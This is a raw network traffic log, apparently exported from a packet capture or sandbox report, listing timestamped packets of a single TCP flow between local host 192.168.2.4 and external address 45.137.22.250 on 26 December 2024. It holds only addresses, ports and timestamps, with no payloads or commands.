Dec 26, 2024 17:42:19.651933908 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651954889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.651962042 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.651998043 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652007103 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652107954 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652158976 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652172089 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652230024 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652276993 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652290106 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652302980 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652373075 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652489901 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652504921 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652546883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652560949 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652607918 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652645111 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652657986 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652681112 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652693033 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652709007 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652741909 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652757883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652770996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652815104 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652848005 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652859926 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652916908 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.652929068 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652944088 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.652980089 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653007984 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653018951 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653033018 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653059006 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653075933 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653090954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653110981 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653142929 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653147936 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653177977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653237104 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653347015 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653359890 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653404951 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653435946 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653450012 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653464079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653501034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653512955 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653517962 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653563976 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653577089 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653584003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653604984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653613091 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653615952 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653640032 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653677940 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653687954 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653702021 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653713942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653748035 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653757095 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653760910 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653775930 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653798103 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653827906 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653844118 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653857946 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653892040 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653918028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653935909 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653975010 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.653981924 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.653989077 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654010057 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654021978 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654027939 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654068947 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654083014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654098034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654135942 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654149055 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654160976 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654191017 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654206038 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654226065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654275894 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654299974 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654313087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654359102 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654395103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654407024 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654419899 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654432058 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654453039 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654464960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654465914 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654493093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654501915 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654505014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654531002 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654556990 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654567003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654580116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654624939 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654716015 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654728889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654752016 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654764891 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654784918 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654803991 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654814959 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654827118 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654853106 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654872894 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.654923916 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.654937029 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655004025 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.655035973 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655049086 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655061960 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655073881 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655086994 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655093908 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.655101061 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655114889 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655123949 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.655128002 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.655164957 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.655195951 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761353970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761378050 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761400938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761413097 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761426926 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761461020 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761595011 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761595011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761607885 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761622906 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761647940 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761658907 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761682034 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761699915 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761723042 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761750937 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761815071 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761864901 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761898041 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.761926889 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.761965036 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762008905 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762021065 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762082100 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762149096 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762161970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762176037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762201071 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762259960 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762547970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762640953 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762783051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762795925 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762810946 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762860060 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762914896 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.762979031 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.762980938 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.763020992 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.763036013 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.763044119 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.763118029 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764066935 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764132977 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764189959 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764223099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764245033 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764288902 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764295101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764338970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764339924 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764401913 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764415026 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764451981 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764478922 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764518023 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.764544964 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.764632940 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765389919 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765402079 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765458107 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765474081 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765486002 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765547037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765552044 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765566111 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765614986 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765839100 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765861034 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765908003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765912056 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765921116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.765969038 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.765995979 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766511917 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766558886 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766571999 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766581059 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766629934 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766694069 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766719103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766762972 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766787052 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766792059 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766848087 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.766901970 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.766994953 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.767054081 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.767116070 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.770018101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.770057917 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.770071030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.770076990 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.770139933 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.770143986 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.770157099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.770195007 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.770221949 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.771033049 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.771045923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.771117926 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.772222996 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.772236109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.772294998 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.772528887 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.772541046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.772574902 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.772629976 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.772979021 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773049116 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773061991 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773112059 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.773834944 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773847103 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773905039 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.773905993 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.773951054 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.773957014 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774015903 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.774532080 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774544001 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774583101 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774596930 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.774645090 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774677038 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.774705887 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.774758101 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775147915 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775161028 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775208950 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775247097 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775249958 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775263071 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775299072 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775357962 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775794983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775847912 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.775878906 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.775940895 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776005983 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776019096 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776056051 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776098967 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776326895 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776340008 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776402950 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776415110 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776427031 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776457071 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776495934 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776534081 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.776928902 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776951075 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776964903 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.776999950 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777026892 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777029037 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777041912 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777091980 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777123928 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777136087 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777148962 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777160883 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777185917 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777247906 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777636051 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777702093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777715921 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777729034 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.777746916 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.777786016 CET	49737	55615	192.168.2.4	45.137.22.250
Dec 26, 2024 17:42:19.778250933 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.778264046 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.778302908 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.778348923 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.778379917 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.779361963 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.779376030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.779397011 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.779416084 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.780761003 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.780781984 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.780857086 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.780869961 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.780884027 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.781330109 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.781342030 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.781405926 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.781418085 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783636093 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783657074 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783668995 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783792019 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783804893 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.783816099 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.785022020 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.785033941 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.785080910 CET	55615	49737	45.137.22.250	192.168.2.4
Dec 26, 2024 17:42:19.785118103 CET	55615	49737	45.137.22.250	192.168.2.4
